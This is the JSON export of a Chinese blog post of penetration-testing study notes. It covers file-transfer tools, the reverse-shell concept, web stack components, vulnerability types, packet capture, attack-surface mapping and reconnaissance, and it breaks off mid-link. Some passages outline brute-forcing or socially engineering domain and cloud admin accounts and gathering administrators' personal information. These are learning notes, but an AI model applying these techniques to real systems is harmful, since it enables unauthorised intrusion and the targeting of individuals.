{"id":260,"date":"2024-07-08T16:15:18","date_gmt":"2024-07-08T16:15:18","guid":{"rendered":"http:\/\/mikuhacker.cn\/wp-blog\/?p=260"},"modified":"2024-10-26T03:28:22","modified_gmt":"2024-10-26T03:28:22","slug":"%e7%ac%ac%e4%b8%80%e5%a4%a9%ef%bc%9a%e6%96%87%e4%bb%b6%e4%b8%8b%e8%bd%bd-%e5%8f%8d%e5%bc%b9shell","status":"publish","type":"post","link":"http:\/\/mikuhacker.cn\/?p=260","title":{"rendered":"2024\u5168\u6808\u6e17\u900f\u5b66\u4e60\u7b14\u8bb0(\u4e00)"},"content":{"rendered":"\n<p>\u524d\u63d0\uff1a\u5728WEB\u5b89\u5168\u65b9\u9762\u7684\u5b66\u4e60\u611f\u5230\u4e86\u74f6\u9888\u548c\u8ff7\u832b\uff0c\u5bf9WEB\u65b9\u5411\u4ee5\u5916\u7684\u77e5\u8bc6\u5b58\u5728\u6b20\u7f3a\uff0c\u4e8e\u662f\u51b3\u5b9a\u901a\u8fc7\u5c0f\u8fea\u7684\u5168\u6808\u6e17\u900f\u8bfe\u7a0b\u67e5\u6f0f\u8865\u7f3a\u4e00\u4e0b\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e00\u5929\uff1a\u6587\u4ef6\u4e0b\u8f7d&amp;\u53cd\u5f39shell<\/h2>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>PS.\u67e5\u8be2\u653b\u51fb\u65b9\u5f0f\u540d\u79f0\uff08ATT&amp;CK\uff09<\/strong>\uff1a<a href=\"http:\/\/attack.mitre.org\">https:\/\/attack.mitre.org<\/a><\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\"><strong>\u5de5\u5177\u7f51\u7ad9\uff1a\uff08\u68f1\u89d2\uff09<\/strong><a href=\"https:\/\/forum.ywhack.com\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"https:\/\/forum.ywhack.com\/ (opens in a new tab)\">https:\/\/forum.ywhack.com\/<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6587\u4ef6\u4e0b\u8f7d<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u76ee\u7684\uff1a\u89e3\u51b3\u65e0\u56fe\u5f62\u5316\u754c\u9762&amp;\u6570\u636e\u4f20\u8f93\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u547d\u4ee4\u90fd\u53ef\u4ee5\u5728<strong>\u68f1\u89d2<\/strong>\u4e0a\u67e5\u8be2<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Linux\uff1a<strong>wget<\/strong> curl python ruby perl java\u7b49<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Windows\uff1aPowershell Certutil Bitsadmin msiexec mshta rund1132\u7b49<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u53cd\u5f39shell<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u76ee\u7684\uff1a\u89e3\u51b3\u6570\u636e\u56de\u663e&amp;\u6570\u636e\u901a\u8baf\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u5e94\u7528\u60c5\u666f\uff1a\u5916\u90e8\u65e0\u6cd5\u7ed5\u8fc7\u9632\u706b\u5899\u8bbf\u95ee\u5185\u7f51\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5177\u4f53\u547d\u4ee4\u53ef\u4ee5\u7528\u68f1\u89d2\u8bbe\u7f6e\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5185\u7f51 &#8211;&gt; ip<\/strong>\uff08\u5185\u7f51\u53ef\u4ee5\u5411\u5916\u90e8IP\u8fdb\u884c\u8bbf\u95ee\uff09<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>ip !&#8211;&gt; \u5185\u7f51<\/strong>\uff08\u9632\u706b\u5899\u539f\u56e0\u4f7f00\u5916\u90e8IP\u4e0d\u80fd\u8bbf\u95ee\u5185\u7f51\uff09<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u53cd\u5f39shell\uff1a<\/strong>\u5f53\u62ff\u5230\u4e00\u4e2a<strong>\u5185\u7f51\u673a\u5b50<\/strong>\u7684RCE\uff08<strong>\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c<\/strong>\uff09\u65f6\uff0c\u53ef\u4ee5\u901a\u8fc7RCE\u5199\u4e00\u4e2a<strong>\u53cd\u5f39\u547d\u4ee4<\/strong>\uff0c\u5f39\u4e00\u4e2a<strong>shell<\/strong>\u7ed9<strong>\u653b\u51fb\u673a<\/strong>\uff0c\u4ece\u800c\u5b9e\u73b0\u4efb\u610f\u547d\u4ee4\u6267\u884c\u4ee5\u53ca\u56de\u663e\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e8c\u5929\uff1aWEB\u5e94\u7528\u67b6\u6784&amp;\u6f0f\u6d1e&amp;HTTP<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">WEB\u5e94\u7528\u67b6\u6784 <\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">WEB\u5e94\u7528\u7ec4\u6210\u89d2\u8272\u529f\u80fd\u67b6\u6784\uff1a\u5f00\u53d1\u8bed\u8a00\u3001\u7a0b\u5e8f\u6e90\u7801\u3001\u4e2d\u95f4\u4ef6\u5bb9\u5668\u3001\u6570\u636e\u5e93\u7c7b\u578b\u3001\u670d\u52a1\u5668\u64cd\u4f5c\u7cfb\u7edf\u3001\u7b2c\u4e09\u65b9\u8f6f\u4ef6\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5f00\u53d1\u8bed\u8a00<\/strong>\uff1aasp\uff0c<strong>php<\/strong>\uff0caspx\uff0cjsp\uff0c<strong>java<\/strong>\uff0c<strong>python<\/strong>\uff0cruby\uff0cgo\uff0c<strong>html<\/strong>\uff0c<strong>javascrip<\/strong>t\u7b49\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7a0b\u5e8f\u6e90\u7801<\/strong>\uff1a\u5f00\u53d1\u8bed\u8a00\u5206\u7c7b\u3001\u5e94\u7528\u7c7b\u578b\u5206\u7c7b\u3001<strong>\u5f00\u6e90cms\u5206\u7c7b<\/strong>\u3001\u5f00\u53d1\u6846\u67b6\u5206\u7c7b\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u4e2d\u95f4\u4ef6\u5bb9\u5668<\/strong>\uff1a<strong>IIS<\/strong>\uff0c<strong>Apache<\/strong>\uff0c<strong>Nginx<\/strong>\uff0c<strong>Tomcat<\/strong>\uff0cWeblogic\uff0cJboos\uff0cglasshfish\u7b49\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u6570\u636e\u5e93\u7c7b\u578b<\/strong>\uff1a<strong>Access<\/strong>\uff0c<strong>Mysql<\/strong>\uff0cMssql\uff0cOracle\uff0cdb2\uff0cSybase\uff0c<strong>Redis<\/strong>\uff0c<strong>MongoDB<\/strong>\u7b49\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u670d\u52a1\u5668\u64cd\u4f5c\u7cfb\u7edf<\/strong>\uff1aWindows\u7cfb\u5217\uff0c<strong>Linux\u7cfb\u5217<\/strong>\uff0cMac\u7cfb\u5217\u7b49\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7b2c\u4e09\u65b9\u8f6f\u4ef6<\/strong>\uff1a<strong>phpmyadmin<\/strong>\uff0cvs-ftpd\uff0cVNC\uff0cELK\uff0cOpenssh\u7b49\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u5e38\u89c1WEB\u5e94\u7528\u5b89\u5168\u6f0f\u6d1e\u5206\u7c7b<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">SQL\u6ce8\u5165\uff0c\u6587\u4ef6\u5b89\u5168\uff0cRCE\u6267\u884c\uff0cXSS\u8de8\u7ad9\uff0cCSRF\/SSRF\/CRLF\uff0c\u53cd\u5e8f\u5217\u5316\uff0c\u903b\u8f91\u8d8a\u6743\uff0c\u672a\u6388\u6743\u8bbf\u95ee\uff0cXXE\/XML\uff0c\u5f31\u53e3\u4ee4\u7b49\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">HTTP\u6570\u636e\u5305<\/h3>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u5b66\u4e60HTTP\u6570\u636e\u5305\u65f6\u5efa\u8bae\u914d\u5408Burpsuit\u6293\u5305\u6765\u7406\u89e3\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u8bf7\u6c42\u6570\u636e\u5305\uff08Request\uff09<\/strong>\uff1a\u8bf7\u6c42\u884c\u3010\u65b9\u6cd5\u5b57\u6bb5\uff08GET\uff0cPOST\uff0cHEAD\uff0cPUT\uff0cDELETE\uff09\uff0cURL\u5b57\u6bb5\uff0cHTTP\u7248\u672c\u5b57\u6bb5\u3011\uff0c\u9996\u90e8\u884c\uff0c\u5b9e\u4f53\u4f53\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u54cd\u5e94\u5305\uff08Response\uff09<\/strong>\uff1a\u72b6\u6001\u884c\uff08\u72b6\u6001\u7801\uff09\uff0c\u9996\u90e8\u884c\uff0c\u5b9e\u4f53\u4f53\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e09\u5929\uff1a\u6293\u5305&amp;\u5c01\u5305<\/h2>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u4e0d\u540c\u5bf9\u8c61\u91c7\u7528\u4e0d\u540c\u6293\u5305\u5c01\u5305\u6280\u672f\u3002<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u6293\u5305\u7684\u76ee\u7684\uff1a<strong>\u5c06\u770b\u4e0d\u89c1\u7684\u4e1c\u897f\u8f6c\u6210\u80fd\u770b\u89c1\u7684\u4e1c\u897f\u3002<\/strong><\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u76f8\u5173\u5de5\u5177\u6293\u53d6<strong>HTTPS<\/strong>\u6570\u636e\u5305\u9700\u8981\u5b89\u88c5\u8bc1\u4e66\uff0c\u94fe\u63a5\u5982\u4e0b\uff1a<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Charles\uff1a<a href=\"https:\/\/blog.csdn.net\/weixin_45459427\/article\/details\/108393878\">https:\/\/blog.csdn.net\/weixin_45459427\/article\/details\/108393878<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">Fiddler\uff1a<a href=\"https:\/\/blog.csdn.net\/weixin_45043349\/article\/details\/120088449\">https:\/\/blog.csdn.net\/weixin_45043349\/article\/details\/120088449<\/a><\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>Burpsuite<\/strong>\uff1a<a href=\"https:\/\/blog.csdn.net\/qq_36658099\/article\/details\/81487491\">https:\/\/blog.csdn.net\/qq_36658099\/article\/details\/81487491<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u4e8e\u7f51\u7edc\u63a5\u53e3\u6293\u5305<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>WireShark<\/strong> &amp; <strong>\u79d1\u6765\u7f51\u7edc\u5206\u6790\u7cfb\u7edf<\/strong> &amp; <strong>TCPDump<\/strong>\u8bbe\u7f6e\u7f51\u7edc\u63a5\u53e3\uff08\u7f51\u5361\uff09\u8fdb\u884c\u6293\u5305\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u4e8eWEB\u5e94\u7528\u7ad9\u70b9\u6293\u5305<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u901a\u8fc7\u6d4f\u89c8\u5668<strong>\u67e5\u770b\u5143\u7d20<\/strong>\u8fdb\u884c\u76d1\u542c\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"> \u57fa\u4e8e\u6570\u636e\u534f\u8bae\u6293\u5305-HTTP\/S &amp; TCP &amp; UDP<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u4e8e\u5e94\u7528\u5bf9\u8c61\u6293\u5305-APP &amp; \u5c0f\u7a0b\u5e8f &amp; PC_UI<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">APP &amp; \u5c0f\u7a0b\u5e8f\uff1aBurpsuite\u6293\u5305\u9700\u8981\u8ba9\u7a0b\u5e8f\u8bbe\u5b9a\u4ee3\u7406\uff0c\u5fae\u4fe1\u5c0f\u7a0b\u5e8f\u4e0d\u80fd\u8bbe\u7f6e\u4ee3\u7406\uff0c\u6240\u4ee5\u6293\u4e0d\u4e86\u5fae\u4fe1\u5c0f\u7a0b\u5e8f\u7684\u5305\uff08\u53ef\u4ee5\u901a\u8fc7\u6a21\u62df\u5668\u767b\u5f55\u5fae\u4fe1\u6765\u6293\u5305\u6216\u8005\u6362\u7528Charles\u3001Fidder\uff09\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5982\u679c\u4e0d\u662f\u6293\u53d6WEB\u76f8\u5173\u534f\u8bae\u6570\u636e\u5305\uff0c\u5219Charles\u3001Fidder\u3001Burpsuite\u5219\u6ca1\u6709\u7528\uff0c\u5e94\u6539\u7528WireShark\uff08WIN or Linux\uff09or \u79d1\u6765\u7f51\u7edc\u5206\u6790\u7cfb\u7edf\uff08Windows\uff09or TCPDump\uff08Linux\uff09\u8fdb\u884c<strong>\u5168\u5c40\u534f\u8bae\u6293\u5305\u3002<\/strong><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u4e8e\u7cfb\u7edf\u4f7f\u7528\u6293\u5305-\u624b\u673a\u6a21\u62df\u5668 &amp; Win &amp; Linux<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">\u57fa\u4e8e\u5e94\u7528\u5bf9\u8c61\u5c01\u5305-WPE\u52a8\u4f5c\u6570\u636e\u5305\u91cd\u653e\u901a\u8baf<\/h3>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u6709\u4e9bAPP\u4e0d\u8d70WEB\u534f\u8bae\uff0cBurpsuite\u7b49\u8f6f\u4ef6\u6293\u4e0d\u4e86\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u901a\u8fc7WPE\u6216\u8005\u5176\u5b83\u7684\u5c01\u5305\u76d1\u542c\u5de5\u5177\u53ef\u4ee5\u6293\u53d6\u5e94\u7528\u4e2d\u64cd\u4f5c\u7684\u6570\u636e\u5305\uff0c\u4ece\u800c\u5224\u65ad\u4e0e\u8be5\u529f\u80fd\u6216\u7a0b\u5e8f\u76f8\u5173\u7684IP\u3001\u7aef\u53e3\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u56db\u5929\uff1a\u8d44\u4ea7\u67b6\u6784&amp;\u756a\u5916\u5b89\u5168&amp;\u8003\u8651\u963b\u788d<\/h2>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">PS.\u8fd9\u4e00\u5757\u7684\u5b66\u4e60\u662f\u7ed3\u5408\u81ea\u5df1\u5e73\u65f6\u505a\u6e17\u900f\u6d4b\u8bd5\u7684\u7ecf\u9a8c\u6765\u5b66\uff0c\u5373\u4ece\u62ff\u5230\u4e00\u4e2a\u76ee\u6807\u57df\u540d\u5f00\u59cb\u4ea7\u751f\u6e17\u900f\u7684\u76ee\u6807\u548c\u601d\u8def\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8d44\u4ea7\u67b6\u6784\uff08\u9488\u5bf9\u76ee\u6807\u7f51\u7ad9\uff09<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">WEB\u5355\u4e2a\u6e90\u7801\u6307\u5411\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5355\u4e2a\u7f51\u7ad9<\/strong>\u53ea\u6709<strong>\u4e00\u4e2a\u7a0b\u5e8f<\/strong>\uff0c\u5219\u5bf9\u8be5\u7a0b\u5e8f\u8fdb\u884c\u6d4b\u8bd5\uff08\u82e5\u4e3a<strong>\u9759\u6001\u7f51\u9875<\/strong>\uff0c\u4e00\u822c<strong>\u4e0d\u5b58\u5728<\/strong>\u6f0f\u6d1e\uff0c<strong>\u6709\u529f\u80fd\u624d\u6709\u6f0f\u6d1e<\/strong>\uff09\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">WEB\u591a\u4e2a\u76ee\u5f55\u6e90\u7801\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5355\u4e2a\u7f51\u7ad9<\/strong>\u53ef\u80fd\u5b58\u5728<strong>\u591a\u4e2a\u76ee\u5f55<\/strong>\uff0c\u6bcf\u4e2a\u76ee\u5f55\u5bf9\u5e94\u4e00\u4e2a\u7a0b\u5e8f\u3002\u5206\u522b\u5bf9\u5404\u4e2a\u76ee\u5f55\u8fdb\u884c\u6d4b\u8bd5\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">WEB\u591a\u4e2a\u7aef\u53e3\u6e90\u7801\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u5355\u4e2a\u7f51\u7ad9<\/strong>\u53ef\u80fd\u5b58\u5728<strong>\u591a\u4e2a\u7aef\u53e3<\/strong>\uff0c\u4e0d\u540c\u7aef\u53e3\u5bf9\u5e94\u4e0d\u540c\u7a0b\u5e8f\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u670d\u52a1\u5668\u67b6\u8bbe\u591a\u4e2a\u7ad9\u70b9\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u4e00\u4e2a\u670d\u52a1\u5668<\/strong>\u53ef\u4ee5\u8bbe\u7f6e<strong>\u591a\u4e2a\u57df\u540d\u89e3\u6790<\/strong>\uff0c<strong>\u4e0d\u540c\u57df\u540d<\/strong>\u7ecf\u8fc7DNS\u89e3\u6790\u53ef\u4ee5\u6307\u5411<strong>\u540c\u4e00\u4e2aip<\/strong>\u3002\u901a\u8fc7<strong>FOFA\u641c\u7d22\u5f15\u64ce<\/strong>\uff08<a rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\" href=\"https:\/\/en.fofa.info\/\" target=\"_blank\">https:\/\/en.fofa.info\/<\/a>\uff09\u53ef\u4ee5\u641c\u7d22\u4e00\u4e2aip\u4e0b\u5b58\u5728\u7684\u591a\u4e2a\u7ad9\u70b9\u6216\u5b50\u57df\u540d\uff0c\u4e5f\u53ef\u4ee5\u641c\u7d22\u51fa\u4e00\u4e2a\u57df\u540d\u76f8\u5173\u7684\u5b50\u57df\u540d\u3001\u540c\u4e00\u670d\u52a1\u5668\u4e0b\u7684\u5176\u5b83\u57df\u540d\u3002\u786e\u8ba4\u6240\u6709\u7ad9\u70b9\u540e\u5206\u522b\u8fdb\u884c\u6d4b\u8bd5\u3002<strong>\uff08\u5173\u4e8efofa\u5f15\u64ce\u7684\u7528\u6cd5\u53ef\u4ee5\u53e6\u5916\u67e5\u627e\u5b66\u4e60\uff09<\/strong><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u67b6\u8bbe\u7b2c\u4e09\u65b9\u63d2\u4ef6\u63a5\u53e3\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">WEB\u6e90\u7801\u63d2\u4ef6\uff1aWEB\u6e90\u7801\u4e2d\u542b\u6709\u7684\u63d2\u4ef6\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">WEB\u5e94\u7528\u63d2\u4ef6\uff1a\u4f8b\u5982phpmyadmin\uff0c\u7528\u4e8e\u7ba1\u7406\u5458\u4fbf\u6377\u7ba1\u7406\u6570\u636e\u5e93\uff0c\u4f46\u4e5f\u65b9\u4fbf\u4e86\u653b\u51fb\u8005\u653b\u51fb\u6570\u636e\u5e93\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u670d\u52a1\u5668\u67b6\u8bbe\u591a\u4e2a\u5e94\u7528\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u670d\u52a1\u5668\u5e94\u7528\uff1a\u4f8b\u5982SSH\u3001FTP\u53ef\u80fd\u5b58\u5728\u5f31\u5bc6\u7801\u6216\u793e\u5de5\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u756a\u5916\u5b89\u5168\uff08\u9488\u5bf9\u7f51\u7ad9\u6240\u5728\u670d\u52a1\u5668\uff09<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u57fa\u4e8e\u57df\u540d\u89e3\u6790\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u901a\u8fc7<strong>\u7ad9\u957f\u4e4b\u5bb6<\/strong>\uff08<a href=\"https:\/\/tool.chinaz.com\/\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\" (opens in a new tab)\">https:\/\/tool.chinaz.com\/<\/a>\uff09\u7b49\u5de5\u5177\u67e5\u8be2\u57df\u540d\u5bf9\u5e94\u7684\u670d\u52a1\u5546\uff08\u5982\u963f\u91cc\u4e91\uff09\u548c\u5176\u4ed6\u76f8\u5173\u7684\u7f51\u7ad9\u62a5\u5907\u4fe1\u606f\uff0c\u901a\u8fc7\u7206\u7834\u6216\u793e\u5de5\u7b49\u65b9\u5f0f\u8fdb\u5165\u57df\u540d\u7ba1\u7406\u5e73\u53f0 \uff08\u963f\u91cc\u4e91\u5e73\u53f0\uff09\u4ece\u800c\u63a7\u5236\u7f51\u7ad9\u3002 <\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u57fa\u4e8e\u670d\u52a1\u5668\u672c\u8eab\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5229\u7528\u670d\u52a1\u5668\u672c\u8eab\u5b58\u5728\u7684\u7cfb\u7edf\u7248\u672c\u6f0f\u6d1e\u63a7\u5236\u670d\u52a1\u5668\uff0c\u4ece\u800c\u63a7\u5236\u7f51\u7ad9\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u57fa\u4e8e\u670d\u52a1\u5546\u4fe1\u606f\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u67e5\u627e\u670d\u52a1\u5668\u7684\u8d2d\u7f6e\u5e73\u53f0\uff0c\u901a\u8fc7\u7206\u7834\u6216\u793e\u5de5\u7b49\u65b9\u5f0f\u8fdb\u5165\u670d\u52a1\u5668\u7ba1\u7406\u5e73\u53f0 \uff08\u963f\u91cc\u4e91\u5e73\u53f0\uff09\u4ece\u800c\u63a7\u5236\u7f51\u7ad9\u3002 <\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u57fa\u4e8e\u7ba1\u7406\u4e2a\u4eba\u7684\u5b89\u5168<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u641c\u96c6\u7f51\u7ad9\u7ad9\u4e3b\u6216\u7ba1\u7406\u5458\u7684<strong>\u4e2a\u4eba\u4fe1\u606f<\/strong>\uff0c\u901a\u8fc7\u793e\u5de5\u65b9\u5f0f\u6216\u5f31\u5bc6\u7801\u83b7\u53d6\u7f51\u7ad9\u7684\u63a7\u5236\u53f0\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u8003\u8651\u963b\u788d<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">\u7ad9\u5e93\u5206\u79bb<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\"><strong>\u7f51\u7ad9<\/strong>\u548c<strong>\u6570\u636e\u5e93<\/strong>\u653e\u7f6e\u5728\u4e0d\u540c\u7684\u670d\u52a1\u5668\u3002\u82e5\u6570\u636e\u5e93\u8bbe\u7f6e\u4ec5\u7f51\u7ad9\u670d\u52a1\u5668\u53ef\u4ee5\u8bbf\u95ee\uff0c\u5219\u65e0\u6cd5\u76f4\u63a5\u8bbf\u95ee\u548c\u6d4b\u8bd5\u6570\u636e\u5e93\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">CDN\u670d\u52a1<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u8bbf\u95ee\u5230\u7684\u7f51\u9875\u6e90\u81ea\u4e8e\u9644\u8fd1\u7684CDN\u8282\u70b9\u7684\u7f13\u5b58\uff0c\u6ca1\u6709\u627e\u5230\u771f\u5b9e\u7684\u670d\u52a1\u5668ip\u5730\u5740\u3002\u9700\u8981\u8d8a\u8fc7CDN\u83b7\u53d6\u670d\u52a1\u5668ip\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u8d1f\u8f7d\u5747\u8861\u670d\u52a1<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u7528\u591a\u53f0\u670d\u52a1\u5668\u8d1f\u8d23\u4e00\u4e2a\u7ad9\u70b9\u7684\u670d\u52a1\uff0c\u9632\u6b62\u8d1f\u8f7d\u8fc7\u5927\u3002\u5373\u4f7f\u653b\u51fb\u6210\u529f\u540e\u4e5f\u53ef\u80fd\u53ea\u62ff\u5230\u4e86\u5907\u7528\u670d\u52a1\u5668\uff0c\u6ca1\u6709\u627e\u5230\u76ee\u6807\u673a\u5668\u53ca\u76ee\u6807\u6570\u636e\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">WAF\u5e94\u7528\u9632\u706b\u5899<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u963b\u6b62SQL\u6ce8\u5165\u3001XSS\u3001\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u7b49<strong>\u9488\u5bf9\u7f51\u7ad9<\/strong>\u7684\u653b\u51fb\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4e3b\u673a\u9632\u62a4\u9632\u706b\u5899<\/h4>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u963b\u6b62\u6728\u9a6c\u8fde\u63a5\u3001\u975e\u6cd5\u8bbf\u95ee\u3001\u540e\u6e17\u900f\u7b49<strong>\u9488\u5bf9\u670d\u52a1\u5668<\/strong>\u7684\u653b\u51fb\u3002<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b2c\u4e94\u5929\uff1a\u4fe1\u606f\u6536\u96c6\uff08\u4e00\uff09<\/h2>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u6280\u672f\u6982\u8981\uff1aCMS\u8bc6\u522b\uff0c\u7aef\u53e3\u626b\u63cf\uff0cCDN\u7ed5\u8fc7\uff0c\u6e90\u7801\u83b7\u53d6\uff0c\u5b50\u57df\u540d\u67e5\u8be2\uff0cWAF\u8bc6\u522b\uff0c\u8d1f\u8f7d\u5747\u8861\u8bc6\u522b<\/p>\n\n\n\n<p class=\"has-vivid-red-color has-text-color\">\u7ebf\u4e0a\u5de5\u5177\u96c6\uff1a <a href=\"http:\/\/coolaf.com\">http:\/\/cool<\/a><a href=\"http:\/\/coolaf.com\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\"af.com (opens in a new tab)\">af.com<\/a><br><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fe1\u606f\u6253\u70b9-WEB\u67b6\u6784\u7bc7<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6253\u70b9-WEB\u67b6\u6784\uff1a\u8bed\u8a00&amp;\u4e2d\u95f4\u4ef6&amp;\u6570\u636e\u5e93&amp;\u7cfb\u7edf\u7b49\uff08\u53ef\u6293\u5305\u67e5\u770b\u6216\u5de5\u5177\u626b\u63cf\uff09<\/li>\n\n\n\n<li>\u6253\u70b9-WEB\u6e90\u7801\uff1aCMS\u5f00\u6e90&amp;\u95ed\u6e90\u552e\u5356&amp;\u81ea\u4e3b\u7814\u53d1\u7b49\uff08\u53ef\u6839\u636e\u7f51\u7ad9\u7c7b\u578b\u731c\u6d4b\uff09<\/li>\n\n\n\n<li>\u6253\u70b9-WEB\u6e90\u7801\u83b7\u53d6\uff1a\u6cc4\u9732\u5b89\u5168&amp;\u8d44\u6e90\u76d1\u63a7&amp;\u5176\u4ed6<\/li>\n\n\n\n<li>\u6253\u70b9-WEB\u57df\u540d\uff1a\u5b50\u57df\u540d&amp;\u76f8\u4f3c\u57df\u540d&amp;IP\u53cd\u67e5\u57df\u540d\uff08fofa\uff09&amp;\u65c1\u6ce8<\/li>\n<\/ul>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5f04\u6e05\u695aWEB\u67b6\u6784\u7684<strong>\u7c7b\u578b<\/strong>\u548c<strong>\u7248\u672c<\/strong>\u540e\u5c31\u53ef\u4ee5\u641c\u7d22\u3001\u5229\u7528\u5df2\u77e5\u7248\u672c\u6f0f\u6d1e<strong>\uff08\u82e5\u5b58\u5728\uff09<\/strong>\u6216\u8005\u5bf9<strong>\u6e90\u7801<\/strong>\u8fdb\u884c<strong>\u4ee3\u7801\u5ba1\u8ba1\uff08\u8f83\u56f0\u96be\uff09<\/strong>\u3002<\/p>\n\n\n\n<p class=\"has-pale-pink-color has-text-color\">\u5728\u4e92\u7ad9\u7f51\uff08<a href=\"http:\/\/huzhan.com\">http:\/\/huzhan<\/a><a href=\"http:\/\/huzhan.com\" target=\"_blank\" rel=\"noreferrer noopener\" aria-label=\".com (opens in a new 